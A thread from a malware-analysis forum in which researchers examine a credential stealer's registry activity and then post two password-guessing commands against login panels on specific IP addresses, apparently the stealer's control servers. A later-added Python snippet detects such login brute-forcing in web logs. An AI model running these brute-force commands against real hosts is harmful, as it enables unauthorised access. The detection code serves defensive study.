A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17889  by rinn
 Sun Jan 27, 2013 12:44 pm
unixfreaxjp wrote:I'll have it remembered for the next time. How about the other registry blob that shot the desktop info,
was it coming from Process Monitor too? I must dig more about this tool.. In the meantime I revoke the analysis related to the point mentioned.

rgds
Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11

Best Regards,
-rin
 #17894  by unixfreaxjp
 Sun Jan 27, 2013 3:13 pm
rinn wrote:Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11
Best Regards,
-rin
Awesome! Bless you for pointing me to the correct path. I guess I'm a full-time learner for sure.
Just checked it here and there, to find that the usual registry changes (autorun, configs + some little here & there) were what the stealer actually did. No changes in registry. I revoke all of my statements accordingly.
 #17895  by Xylitol
 Sun Jan 27, 2013 3:37 pm
panel locs, web stuff
 #17899  by unixfreaxjp
 Sun Jan 27, 2013 5:43 pm
use:
Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 85.143.166.141 http-post-form "/mx/3A/panel/events.php:login&username=admin&password=^PASS^:Bad user name or password."
works.
 #17901  by unixfreaxjp
 Sun Jan 27, 2013 6:39 pm
the other one:
Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.76.177.123 http-post-form "/if_Career/admin.php:&pass=^PASS^:Bad user name or password." 
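From the defender's side, the pattern in the two commands above (one source repeatedly POSTing to a panel login form and getting the same "bad password" page back every time) is easy to pick out of a web server's access log. The following is an added example, not code from this thread or from any of the posters; the log lines are constructed sample data, the panel path is the one quoted in the thread, and the window and threshold values are assumptions to tune per site:

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec

def detect_form_bruteforce(lines, login_paths, window_s=60, threshold=10):
    """Flag (ip, path) pairs with >= threshold POSTs to a login form inside any window_s span.
    A guessing tool fails the same way every attempt, so the response sizes seen are reported:
    a single repeated size is the failure page, a second size usually means a hit."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in login_paths:
            posts[(rec["ip"], rec["path"])].append((rec["ts"], rec["status"], rec["size"]))
    hits = []
    for (ip, path), events in posts.items():
        events.sort(key=lambda e: e[0])
        lo, best = 0, 0
        for hi in range(len(events)):  # sliding window over timestamps
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            hits.append({"ip": ip, "path": path, "max_in_window": best,
                         "response_sizes": sorted({e[2] for e in events if e[2] is not None})})
    return hits

def build_sample_log():
    """Constructed sample data (not real traffic): one address hammering the login form."""
    tmpl = '{ip} - - [27/Jan/2013:18:{mm:02d}:{ss:02d} +0000] "{m} {p} HTTP/1.1" {st} {sz} "-" "curl/7.x"'
    lines = [tmpl.format(ip="10.0.0.5", mm=39, ss=2 * i, m="POST", p="/mx/3A/panel/events.php", st=200, sz=512)
             for i in range(12)]  # 12 identical failures in 22 seconds
    lines.append(tmpl.format(ip="10.0.0.9", mm=39, ss=5, m="POST", p="/mx/3A/panel/events.php", st=302, sz=0))
    lines.append(tmpl.format(ip="10.0.0.9", mm=40, ss=5, m="GET", p="/mx/3A/panel/cp.php", st=200, sz=2048))
    return lines
```

Run it as `detect_form_bruteforce(build_sample_log(), {"/mx/3A/panel/events.php"})`; the single legitimate login from 10.0.0.9 is not reported, the burst from 10.0.0.5 is.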
 #17902  by unixfreaxjp
 Sun Jan 27, 2013 6:46 pm
Xylitol wrote:nah, will not work
Thank you for replying and for the advice, but pls look at this:
[image]
attached pwd.lst I used.
Attachments
internal members only pls..
 #17903  by unixfreaxjp
 Sun Jan 27, 2013 6:58 pm
Xylitol wrote:should be ok.
I revoked my commands for 85.143.166.141, yes Xylit0l's ones worked better!
snipped:
[image]
One more thing, bad news: all of the pwd.lst got rejected..
As suspected, they encrypt the pwds now.. (banging head against the wall)
Would love to get the screenshot for evidence, any help?
 #17904  by unixfreaxjp
 Sun Jan 27, 2013 7:09 pm
Tried all previous cases' passwords. All of them failed. The latest one is attached.
Guess we must start decrypting it properly.. ok, good, starting now..
Attachments
internal material only.